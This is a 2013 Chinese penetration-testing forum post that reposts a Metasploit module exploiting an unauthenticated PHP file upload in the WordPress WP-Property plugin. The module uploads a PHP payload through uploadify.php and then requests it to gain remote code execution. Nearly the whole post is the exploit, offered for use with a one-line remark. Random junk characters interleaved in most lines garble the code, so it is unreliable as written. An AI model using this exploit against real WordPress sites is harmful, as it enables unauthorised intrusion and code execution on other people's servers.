中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]

作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞
3 P) ]3 _5 `6 C$ z2 p% N' w. |
  S' u6 w3 c/ M: e5 h ## # This file is part of the Metasploit Framework and may be subject to
0 D5 a" t* b/ i- t0 p& z: t! N; w2 T" g" S$ ^
# redistribution and commercial restrictions. Please see the Metasploit5 h0 T9 y. T; Z: @4 m' I
' Q" e3 ?% P2 C! \6 W; B  U
# Framework web site for more information on licensing and terms of use.
/ |2 U& D. A9 n3 Z1 k, X
* p, F) s. L  x0 \  e" {#   http://metasploit.com/framework/ ##3 H4 r1 n+ i0 C/ `% F

/ s4 [' w7 d% o / W) d5 d6 G+ ~- [5 ?3 i( N
) B0 k! @& {$ j: W9 D9 }$ z& q+ K

  ?2 D1 K0 {- n% q# b, i  T! A1 l/ z$ u- }* @; c
require 'msf/core': k. m1 ?2 |7 h$ C' D
require 'msf/core/exploit/php_exe'+ j) {1 F2 b2 A2 ]8 K
5 _1 Z1 B: U/ v% f
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
  b8 u+ {: y7 D1 i+ R. c'Description'    => %q{# B2 c; G4 H2 a( ^5 A' ~1 t
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
# F/ Z& R1 T' y0 N: s# ~[
; w0 _6 ]6 v- ]% x5 B# l$ A'Sammy FORGIT', # initial discovery* X1 c/ n( v. H4 l
'James Fitts <fitts.james[at]gmail.com>' # metasploit module, u, Q7 i8 J; C' b
],
& j1 _: ]/ n( E% k; p'License'        => MSF_LICENSE,( k, L4 i2 u, I/ T! l
'References'     =>8 {8 Q0 v9 n. v6 L
[
! j# f9 y3 }- j; Q+ P0 A+ O[ 'OSVDB', '82656' ],
8 O: D8 d7 @( W. F  D[ 'BID', '53787' ],: I" e! u. W/ Q" M, h
[ 'EDB', '18987'],
3 _. G9 V! t/ u) R/ c7 i) |[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]) M& `* O5 G; T
],1 n6 I7 ~, e. i7 a; I
'Payload'        =>
  o0 B9 u* Z. g6 X{& [% C/ U* n" j* V) I/ C; l
'BadChars' => "\x00",+ Y9 s: t+ I3 W5 F$ D2 s. A$ E% q
},+ U7 N; o* B* W
'Platform'       => 'php',% v7 @4 j" W. C( M/ J# |7 N
'Arch'           => ARCH_PHP,+ |; @( a) I! C: c; g( e/ r: ~. u# V
'Targets'        =>; @% f( b4 y, S2 L8 l
[
2 R7 j) K7 y- {9 ^6 A+ x0 s& J[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],4 x/ w/ D. d6 R6 `2 ?/ F) C
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
# z4 y# @2 Q/ s9 L],
2 A0 u8 R: C3 B5 o'DefaultTarget'  => 0,+ n  l) k5 q8 a3 R4 x' m; M, W
'DisclosureDate' => 'Mar 26 2012'))4 K* d: Q+ G+ o; u5 X3 M
4 v0 g7 ?- h* T- Q, b
register_options() i5 B# v% ?4 f& G
[, i6 R; z' `: b% q, [2 P" n! U
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
* k% @/ h8 ]7 e3 i. d], self.class)
) A8 t# o/ ], k+ l! D- D! Q" Hend$ V9 |5 j+ ?! Q, \- R+ ]
9 V; |2 O- w( ~
def check
- p5 r7 o6 {" ?/ a: Q- v+ iuri =  target_uri.path
5 T' e4 ^' b% P) i! Vuri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',! U$ q5 O. b  L& o! s
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php": q+ L. d6 M" }4 }  B/ |* ?
})
. o+ B' ]# M" l4 D& r" Z( A; ?3 o# L# h! W$ g$ S
if not res or res.code != 2003 D2 x8 n2 X1 T% D1 Q
return Exploit::CheckCode::Unknown" o4 M. n( }* \  }
end- j  h4 y5 D7 O5 b/ `$ |
7 @* l2 E9 A2 C- x& u- F
return Exploit::CheckCode::Appears
3 Y6 S4 F# n/ p6 E' q0 Tend
9 g4 j* y# O- Q$ v6 E. p$ H: L& D. \
def exploit
, H+ {5 s; M$ r/ i, X3 Furi =  target_uri.path
$ y. g! P+ g+ N5 puri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)# a) Z- `8 T+ K

" {8 K* B' X$ M) x" h3 S5 idata = Rex::MIME::Message.new
- k+ p& |7 ^0 ^; p2 s4 m3 ?data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")0 d* Z* u! {2 P  z/ Y3 w5 Q, S
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
7 f6 T+ g: x4 ^0 }post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
3 g- F8 l9 Y7 z- J+ [  f
. E9 q7 M- L) h" o9 e/ tprint_status("#{peer} - Uploading payload #{@payload_name}")
9 K% V) I) m9 U, l0 t. H) jres = send_request_cgi({
3 M1 r, r: a1 i8 q; q7 E7 i'method' => 'POST',* h' F8 Q! T( _1 s3 u
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
/ ?* [, m5 i% M  p'ctype'  => "multipart/form-data; boundary=#{data.bound}",& ]/ T& x3 U! y
'data'   => post_data
# z7 ^4 }. f$ X. c' T})
& k) t% N! n2 \3 d5 w% [' i
4 I, m$ V8 K/ j- T) ~if not res or res.code != 200 or res.body !~ /#{@payload_name}/. _5 n. i; U) A' C1 a$ s
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")9 n1 a9 g0 B1 y+ l( y, |. `
end# M5 l+ I; |: I# Q" @
; l8 \  C. r4 c7 }+ T2 h
upload_uri = res.body$ |$ P8 g; F* d1 ]% O+ K0 q

0 C% y6 j1 e" W. G9 v6 ?print_status("#{peer} - Executing payload #{@payload_name}")
) i. ^2 \) I2 z& ures = send_request_raw({
" s' c8 {' s$ B% j+ _% i'uri'    => upload_uri,( H: j6 [4 H# J
'method' => 'GET'
" D5 W+ D# s, R! G1 }" f})* y, s+ j8 U3 s
end
8 \9 N  _4 a0 A( v% o5 ]$ Iend
9 A! `7 O" D: b% Z* ^* s  G* j
. k; Q; X2 r. C不要问我这写的是什么 怎么利用 我是说msf.
, ]  X- h0 M2 d, {9 I7 z" j/ Z2 X+ @3 e9 i1 w; W





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2